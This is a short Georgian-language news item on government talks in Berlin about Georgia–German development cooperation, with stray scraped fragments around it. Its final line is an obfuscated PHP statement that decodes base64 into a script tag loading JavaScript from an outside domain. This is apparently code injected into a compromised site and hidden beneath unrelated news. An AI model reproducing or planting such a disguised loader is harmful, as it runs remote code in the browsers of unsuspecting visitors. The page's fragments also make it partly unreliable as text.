celsiusi
ავერსი საქკაბელი

ქალაქ ბერლინში დღეს გაიხსნა საქართველოსა და გერმანიის ფედერაციულ რესპუბლიკას შორის განვითარების სფეროში თანამშრომლობის შესახებ, მორიგი სამთავრობო მოლაპარაკებები, რომელზედაც მხარეები მიმოიხილავენ ორ ქვეყანას შორის თანამშრომლობის საკითხებს, გერმანიის მთავრობის მიერ მხარდაჭერილი პროექტების მიმდინარეობასა და პარტნიორობის ახალ, დაგეგმილ მიმართულებებს. 

მოლაპარაკებები გახსნეს საქართველოს ფინანსთა მინისტრმა, ლაშა ხუციშვილმა და გერმანიის ფედერაციული რესპუბლიკის, ეკონომიკური თანამშრომლობისა და განვითარების მინისტრმა, სვენია შულცემ.

მოლაპარაკებების შედეგად, საქართველოს მთავრობასა და გერმანიის ფედერაციული რესპუბლიკის მთავრობას შორის განვითარების სფეროში თანამშრომლობის შესახებ მოლაპარაკებების ოქმს საქართველოს მხრიდან ხელს მოაწერს საქართველოს ფინანსთა მინისტრის მოადგილე, ეკატერინე გუნცაძე. 

443
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");